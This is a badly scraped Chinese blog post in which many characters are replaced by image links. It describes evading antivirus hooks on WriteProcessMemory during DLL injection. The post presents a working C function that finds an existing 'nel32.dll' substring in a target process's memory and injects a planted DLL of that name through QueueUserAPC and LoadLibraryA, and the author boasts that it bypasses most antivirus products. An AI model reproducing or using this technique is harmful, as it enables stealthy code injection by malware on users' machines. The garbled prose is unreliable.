目
![](http://www.kanwenzhang.com/images/a_3/200974/20097415454273149.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/2009741518667252.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/20097415253462650.gif)
数
![](http://www.kanwenzhang.com/images/a_3/200974/2009741520417363.gif)
杀软都
![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
hook NtWriteVirtualMemory
![](http://www.kanwenzhang.com/images/a_3/200974/20097415311981445.gif)
NtUserSetWindowsHookAW、NtUserSetWindowsHookE
![](http://www.kanwenzhang.com/images/a_3/200974/20097415402288572.gif)
防止代码注入。
关于代码注入Ring3层![](http://www.kanwenzhang.com/images/a_3/200974/2009741520417363.gif)
主
有:
l 远程线程CreateRemoteThread
l 消息钩子SetWindowsHookEx
l Ring3 APC QueueUserApc
l 修改线程![](http://www.kanwenzhang.com/images/a_3/200974/2009741549939664.gif)
文SetContextThread
其
第
种
第三种
需
传入
个param,但![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
求这个param必须
目标进程
存空间,![](http://www.kanwenzhang.com/images/a_3/200974/20097416173935938.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/20097415454273149.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/2009741520417363.gif)
些
比较笨重,直接
目标进程VirtualAllocEx
存,然![](http://www.kanwenzhang.com/images/a_3/200974/20097415323666421.gif)
希望
参数
容
入这个
存,使![](http://www.kanwenzhang.com/images/a_3/200974/20097416142886726.gif)
WriteProcessMemory函数,而这个函数
被hook
,所以杀软
以
容易
拦截代码注入行
。
仔细想想,杀软
这种防御![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
失败
!原因![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/2009741671447914.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/20097415405544528.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/20097416112751085.gif)
个param,攻击
完全没有必
做这么![](http://www.kanwenzhang.com/images/a_3/200974/2009741518667252.gif)
动作去目标进程
存空间申![](http://www.kanwenzhang.com/images/a_3/200974/20097415473990448.gif)
存并![](http://www.kanwenzhang.com/images/a_3/200974/20097416105995404.gif)
存,![](http://www.kanwenzhang.com/images/a_3/200974/2009741695173948.gif)
思考
否
以不
WriteProcessMemory函数呢?反![](http://www.kanwenzhang.com/images/a_3/200974/20097416172184091.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/2009741695173948.gif)
目
就
得![](http://www.kanwenzhang.com/images/a_3/200974/20097415185994893.gif)
个合理
param,并且这个param![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
目标进程
存空间即
!
思考
,原![](http://www.kanwenzhang.com/images/a_3/200974/20097415402288572.gif)
切
这么容易啊,哈哈!乐![](http://www.kanwenzhang.com/images/a_3/200974/20097415405544528.gif)
半天~~~
举个例子:假设![](http://www.kanwenzhang.com/images/a_3/200974/2009741695173948.gif)
这样注入
:
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
想让
面
param![](http://www.kanwenzhang.com/images/a_3/200974/2009741520417363.gif)
容![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
个“xxx.dll”,就
以
,而且
求这个param![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
目标进程
存空间
您想![](http://www.kanwenzhang.com/images/a_3/200974/20097415185994893.gif)
么?哈哈
答案:直接
目标进程搜索
个这样
字符串“nel32.dll”就
以啦!因
“kernel32.dll” 这样
字符串![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
定存![](http://www.kanwenzhang.com/images/a_3/200974/20097416161356349.gif)
,那么![](http://www.kanwenzhang.com/images/a_3/200974/2009741671447914.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/20097415405544528.gif)
“kernel32.dll” 不
样,那就随便使![](http://www.kanwenzhang.com/images/a_3/200974/20097416142886726.gif)
![](http://www.kanwenzhang.com/images/a_3/200974/20097416133580991.gif)
“nel32.dll”,或
“el32.dll”,都![](http://www.kanwenzhang.com/images/a_3/200974/20097415495110934.gif)
以
啊!最![](http://www.kanwenzhang.com/images/a_3/200974/20097415323666421.gif)
往windows目录
面撂进入
个nel32.dll,这样注入
部分杀软都
不能拦截![](http://www.kanwenzhang.com/images/a_3/200974/20097415185994893.gif)
!哈哈!
![](http://www.kanwenzhang.com/images/a_3/200974/20097416105995404.gif)
段程序,做
个试验,仅测试![](http://www.kanwenzhang.com/images/a_3/200974/20097415405544528.gif)
趋势,完美绕过!其实杀软稍
测试。。。
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
//////////////////////////////////////////////////////////////////////////
//不
目标进程![](http://www.kanwenzhang.com/images/a_3/200974/2009741520417363.gif)
存
//直接
目标进程
搜索出 nel32.dll 这样
字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//获得该进程
基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
printf("CreateToolhelp32Snapshot error!n");
return 0;
}
MODULEENTRY32 me = { sizeof(me) };
BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
printf("Module32First error!n");
return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
printf("%s process module name = %sn",processName,me.szModule);
//
得进程模块基址
if(stricmp(me.szModule,processName)==0)
{
defaultAddress=(DWORD)me.modBaseAddr;
printf("%s process module base = 0x%08Xn",processName,defaultAddress);
break;
}
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
printf("ReadProcessMemory error!n");
return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
{
printf("found nel32.dll already!... %sn",buffer+i);
while (pCurrentTid)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
if (hThread != NULL)
{
//
// 注入DLL
指定进程
//
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
}
printf("TID:%dn", pCurrentTid->dwTid) ;
pCurrentTid = pCurrentTid->pNext ;
}
break;
}
}
return 0 ;
}